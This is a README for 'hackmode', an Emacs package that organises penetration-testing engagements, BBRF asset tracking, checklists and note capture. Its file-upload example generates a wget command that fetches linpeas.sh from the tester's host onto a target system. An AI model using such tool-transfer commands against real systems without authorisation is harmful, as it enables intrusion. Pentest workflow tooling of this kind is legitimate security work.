A comprehensive Emacs package designed to streamline penetration testing workflows by providing integrated tools for operation management, asset tracking, and automation - all from within your favorite editor.
As a pentester, you’re constantly juggling multiple tools, keeping track of targets, managing scan outputs, and organizing findings across different engagements. Traditional workflows often involve:
- Scattered terminal sessions across different directories
- Manual file management for different operations
- Copy-pasting commands between tools
- Losing track of wordlists and payloads
- Inconsistent project structure
hackmode was created to solve these pain points by bringing everything into Emacs - providing a unified interface for operation management, asset tracking with BBRF integration, and workflow automation. Think of it as your pentesting command center that grows with your methodology.
- Operation Management: Create and switch between different pentesting engagements with isolated workspaces
- Asset Tracking: Full BBRF (Bug Bounty Reconnaissance Framework) integration for managing targets, domains, IPs, and URLs
- File Upload Helper: Generate wget/curl commands for easy file transfers to target systems
- Tool Serving: Centralized tool management and serving
- Target Management: Keep track of current targets with completion and easy switching
- Checklist Integration: Copy and manage methodology checklists per target
- Transient Menus: Clean, discoverable interfaces for all functionality
- Environment Integration: Automatic direnv setup for proper environment isolation
(use-package hackmode
:straight (:host github :repo "lost-rob0t/emacs-hackmode")
:custom
(hackmode-dir "~/pentesting") ; Base directory for operations
(hackmode-interface "tun0") ; Default network interface
(hackmode-wordlist-dir "~/wordlists") ; Wordlist directory
(hackmode-tools-dir "~/tools") ; Tools directory
(hackmode-templates "~/.config/hackmode/templates") ; Project templates
:config
;; Hook to automatically navigate to operation directory
(add-hook 'hackmode-operation-hook #'hackmode-goto-operation)
;; Optional: Set up capture templates for quick note-taking
(setq hackmode-capture-templates
'(("f" "Finding" entry
(file+headline "findings.org" "Findings")
"* TODO %^{Title}\n%T\n%?")
("n" "Note" entry
(file+datetree "notes.org")
"* %^{Title}\n%T\n%?")))
;; Optional: Set up checklists
(setq hackmode-checklists
'(("Web Application" . "~/checklists/webapp.org")
("Network" . "~/checklists/network.org")
("Active Directory" . "~/checklists/ad.org"))))- Clone the repository:
git clone https://github.com/lost-rob0t/emacs-hackmode ~/.emacs.d/lisp/hackmode- Add to your Emacs configuration:
(add-to-list 'load-path "~/.emacs.d/lisp/hackmode")
(require 'hackmode)(use-package hackmode
:straight (:host github :repo "lost-rob0t/emacs-hackmode")
:bind (("C-c h" . hackmode-menu)
("C-c H" . hackmode-bbrf-menu))
:custom
(hackmode-dir "~/engagements")
(hackmode-interface "tun0")
(hackmode-wordlist-dir "/usr/share/wordlists")
:config
(add-hook 'hackmode-operation-hook #'hackmode-goto-operation))(use-package hackmode
:straight (:host github :repo "lost-rob0t/emacs-hackmode")
:bind (("C-c h" . hackmode-menu)
("C-c H" . hackmode-bbrf-menu)
("C-c t" . hackmode-select-target)
("C-c u" . hackmode-upload-file))
:custom
(hackmode-dir "~/pentesting")
(hackmode-interface "tun0")
(hackmode-wordlist-dir "~/wordlists")
(hackmode-tools-dir "~/tools")
:config
;; Auto-navigate to operation directory
(add-hook 'hackmode-operation-hook #'hackmode-goto-operation)
;; BBRF hooks for automation
(add-hook 'hackmode-bbrf-domain-added-hook
(lambda () (message "New domain added to BBRF!")))
;; Custom capture templates
(setq hackmode-capture-templates
'(("v" "Vulnerability" entry
(file+headline "findings.org" "Vulnerabilities")
"* %^{Severity|HIGH|MEDIUM|LOW} %^{Title}\n:PROPERTIES:\n:CVSS: %^{CVSS}\n:HOST: %^{Host}\n:PORT: %^{Port}\n:END:\n%T\n\n** Description\n%?\n\n** Impact\n\n** Remediation\n")
("n" "Note" entry
(file+datetree "notes.org")
"* %^{Title}\n%T\n%?")
("t" "Tool Output" entry
(file+headline "scans.org" "Scan Results")
"* %^{Tool} - %^{Target}\n%T\n#+BEGIN_EXAMPLE\n%?\n#+END_EXAMPLE")))
;; Methodology checklists
(setq hackmode-checklists
'(("OWASP Top 10" . "~/checklists/owasp.org")
("Network Pentest" . "~/checklists/network.org")
("Active Directory" . "~/checklists/ad.org")
("Mobile App" . "~/checklists/mobile.org"))))- Create a new operation:
M-x hackmode-menu c (Create operation)
- Select a template and name your operation:
Select Template: web-app-template Enter Operation Name: client-webapp-2024
- Add targets:
M-x hackmode-add-target Enter Target: example.com
- Select current target:
M-x hackmode-select-target Select Target: example.com
- Access BBRF menu:
M-x hackmode-bbrf-menu
- Create a new program:
c (Create program) Enter Program name: client-bounty-2024
- Add domains to BBRF:
d (Add domains) Domains to add: example.com subdomain.example.com
- Add tags for organization:
tt (add a tag) Enter key name: source Enter value: recon
When you need to transfer tools to a target system:
M-x hackmode-upload-file Tool to download: linpeas.sh interface: tun0 port: 8000 Cmd to use to download: wget
This generates and copies to clipboard:
wget http://10.10.14.5:8000/linpeas.sh
Select a region containing domains and add them to BBRF:
M-x hackmode-bbrf-domains-from-region
Apply a methodology checklist to current target:
M-x hackmode-use-checklist Select a checklist: OWASP Top 10
This creates a target-specific checklist file and adds it to your check-lists.org.
hackmode creates a structured workspace for each operation:
~/pentesting/
├── client-webapp-2024/
│ ├── .config/
│ │ └── targets.txt
│ ├── .envrc
│ ├── checklists/
│ │ └── example.com-checklist.org
│ ├── findings/
│ │ └── findings.org
│ ├── notes.org
│ ├── scans/
│ └── check-lists.org
└── .hackmode-tools/
├── linpeas.sh
├── winpeas.exe
└── ...
| Command | Description |
|---|---|
hackmode-menu | Main transient menu |
hackmode-bbrf-menu | BBRF asset management menu |
hackmode-create-operation | Create new operation |
hackmode-switch-op | Switch between operations |
hackmode-select-target | Select current target |
hackmode-add-target | Add new target |
hackmode-upload-file | Generate file upload command |
hackmode-use-checklist | Apply methodology checklist |
hackmode-capture | Quick capture notes/findings |
- Required:
f.el- File path manipulationemacs-async- Asynchronous processingvterm- Terminal emulationtransient- Menu system (built into Emacs 28+)
- Optional:
direnv- Environment managementbbrf- Bug Bounty Reconnaissance Frameworkorg-mode- Note-taking and project management
hackmode embodies the principle that your text editor should be the central hub of your workflow. By bringing pentesting operations into Emacs, you get:
- Consistency: Same interface for all operations
- Integration: Seamless connection between tools and documentation
- Automation: Reduce repetitive tasks through Lisp scripting
- Organization: Structured approach to engagement management
- Extensibility: Easy to customize and extend for your specific needs
- Allow buffer local targets like gptel transient menu
- Move template loading to yasnippet
- Move this stuff to a function (init metadata)
- Add bulk domains command for bbrf
- Add hackmode-bbrf asset listing
- Suggest skeltor templates
- Again remove f.el (one big swoop will be done need seperate elisp devel config)